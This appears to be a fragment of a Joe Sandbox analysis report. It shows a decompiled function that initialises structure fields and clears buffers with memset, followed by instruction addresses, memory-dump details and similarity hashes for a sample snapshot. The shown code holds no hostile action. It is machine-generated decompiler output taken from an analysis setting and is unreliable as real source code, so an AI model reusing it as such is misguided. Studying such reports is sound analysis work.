				 *((intOrPtr*)(_t85 + 0x2c)) = _t19;
				_t21 = _t85 + 0x39272; // 0x39272
				_t68 = _t21;
				 *((intOrPtr*)(_t85 + 0x40)) = 0;
				 *((intOrPtr*)(_t85 + 0x3c)) = 0;
				 *((intOrPtr*)(_t85 + 0x24)) = 0;
				 *((intOrPtr*)(_t85 + 0x20)) = 0;
				 *((intOrPtr*)(_t85 + 0x1c)) = 0;
				 *((intOrPtr*)(_t85 + 0x68)) = 0;
				 *((intOrPtr*)(_t85 + 0x48)) = 0;
				 *((intOrPtr*)(_t85 + 0x64)) = 0;
				 *((intOrPtr*)(_t85 + 0x60)) = 0;
				 *((intOrPtr*)(_t85 + 0x5c)) = 0;
				 *((intOrPtr*)(_t85 + 0x58)) = 0;
				 *((intOrPtr*)(_t85 + 0x38)) = 8;
				 *((intOrPtr*)(_t85 + 0x30)) = _t68;
				 *((intOrPtr*)(_t85 + 0x34)) = _t68;
				 *((intOrPtr*)(_t85 + 0x6c)) = 0;
				 *((intOrPtr*)(_t85 + 0x54)) = 0;
				 *((intOrPtr*)(_t85 + 0x50)) = 0;
				 *((intOrPtr*)(_t85 + 0x4c)) = 0;
				 *((intOrPtr*)(_t85 + 0x18)) = 1;
				 *((intOrPtr*)(_t85 + 0x70)) = 0;
				 *((intOrPtr*)(_t85 + 0x74)) = 0;
				 *((intOrPtr*)(_t85 + 0x78)) = 0;
				 *((intOrPtr*)(_t85 + 0x7c)) = 0;
				 *((intOrPtr*)(_t85 + 0x80)) = 0;
				 *((intOrPtr*)(_t85 + 0x84)) = 0;
				 *((intOrPtr*)(_t85 + 0x88)) = 0;
				 *((intOrPtr*)(_t85 + 0x8c)) = 0;
				if(_t84 == 0) {
					_t49 = _t85 + 0x90; // 0x90
					memset(_t49, 0, 0x8101);
					_t86 = _t86 + 0xc;
				}
				_t50 = _t85 + 0x8192; // 0x8192
				memset(_t50, 0, 0x240);
				_t51 = _t85 + 0x83d2; // 0x83d2
				memset(_t51, 0, 0x40);
				return 0;
			}









                  0x004049a3
                  0x004049a6
                  0x004049b4
                  0x004049b7
                  0x004049ba
                  0x004049be
                  0x004049c0
                  0x004049c3
                  0x004049ce
                  0x004049de
                  0x004049e2
                  0x004049e5
                  0x004049eb
                  0x004049f2
                  0x004049fa
                  0x00404a00
                  0x00404a00
                  0x00404a03
                  0x00404a06
                  0x00404a0c
                  0x00404a0f
                  0x00404a15
                  0x00404a18
                  0x00404a18
                  0x00404a1e
                  0x00404a21
                  0x00404a24
                  0x00404a27
                  0x00404a2a
                  0x00404a2d
                  0x00404a30
                  0x00404a33
                  0x00404a36
                  0x00404a39
                  0x00404a3c
                  0x00404a3f
                  0x00404a46
                  0x00404a49
                  0x00404a4c
                  0x00404a4f
                  0x00404a52
                  0x00404a55
                  0x00404a58
                  0x00404a5f
                  0x00404a62
                  0x00404a65
                  0x00404a68
                  0x00404a6b
                  0x00404a71
                  0x00404a77
                  0x00404a7d
                  0x00404a85
                  0x00404a8c
                  0x00404a94
                  0x00404a9a
                  0x00404a9a
                  0x00404aa2
                  0x00404aaa
                  0x00404ab2
                  0x00404aba
                  0x00404ac9

                  APIs
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: 9fc025132572919f3734a29ac81ef1a2200ba00e6701f7d6fd5a461a0fe62915
                  • Instruction ID: 70126d602587bd303643ef6f1a7dad0836f0adfd5b30951eb2e943be6850c986
                  • Opcode Fuzzy Hash: 9fc025132572919f3734a29ac81ef1a2200ba00e6701f7d6fd5a461a0fe62915
                  • Instruction Fuzzy Hash: D141B2B2900B049FD320CF6AD885683FBE8FB48714B84893ED6DEC2A50D775B5448F54
                  Uniqueness

                  Uniqueness Score: 0.00%